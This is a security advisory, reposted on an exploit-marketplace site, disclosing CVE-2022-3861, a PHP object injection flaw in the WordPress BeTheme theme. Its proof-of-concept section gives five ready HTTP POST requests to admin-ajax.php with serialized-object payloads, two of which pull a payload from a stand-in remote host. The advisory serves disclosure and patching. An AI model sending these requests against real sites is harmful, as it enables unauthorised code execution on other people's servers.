0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress BeTheme 26.5.1.4 PHP Object Injection Vulnerability
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
1. ADVISORY INFORMATION ======================= Product: Betheme Vendor URL: https://muffingroup.com/betheme/ Type: Deserialization of Untrusted Data [CWE-502] Date found: 2022-11-02 Date published: 2022-11-18 CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) CVE: CVE-2022-3861 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== BeTheme 26.5.1.4 and below 4. INTRODUCTION =============== Ever since Betheme was just an idea, we knew that it would be different from all other multipurpose WordPress themes we’d tried before. We wanted to build something more than just another WordPress theme, that could easily adapt to any project you need to work on without writing any code. A theme designed from scratch to save your time & help you enjoy your freedom... (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The WordPress theme is vulnerable to multiple PHP Object injections when processing input to multiple, privileged Wordpress ajax routes: -mfn_builder_import -> "mfn-items-import" parameter -mfn_builder_import_page -> "mfn-items-import-page" parameter -importdata -> "import" parameter -importsinglepage -> "import" parameter -importfromclipboard -> "import" parameter To successfully exploit this vulnerability, an attacker must be authenticated with at least Wordpress "Contributer" rights. Successful exploits can allow the attacker to execute arbitrary code. 6. PROOF OF CONCEPT =================== To exploit the "mfn_builder_import" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 75 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= To exploit the "mfn_builder_import_page" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 123 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/ To exploit the "importdata" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 114 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= To exploit the "importsinglepage" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 83 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/ To exploit the "importfromclipboard" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 123 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= 7. SOLUTION =========== Update to version 26.6 8. REPORT TIMELINE ================== 2022-11-01: Discovery of the vulnerability 2022-11-03: CVE requested from Wordfence (CNA) 2022-11-04: Wordfence assigns CVE-2022-3861 2022-11-08: Vendor notification 2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond 2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability 2022-11-18: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories # 0day.today [2024-07-07] #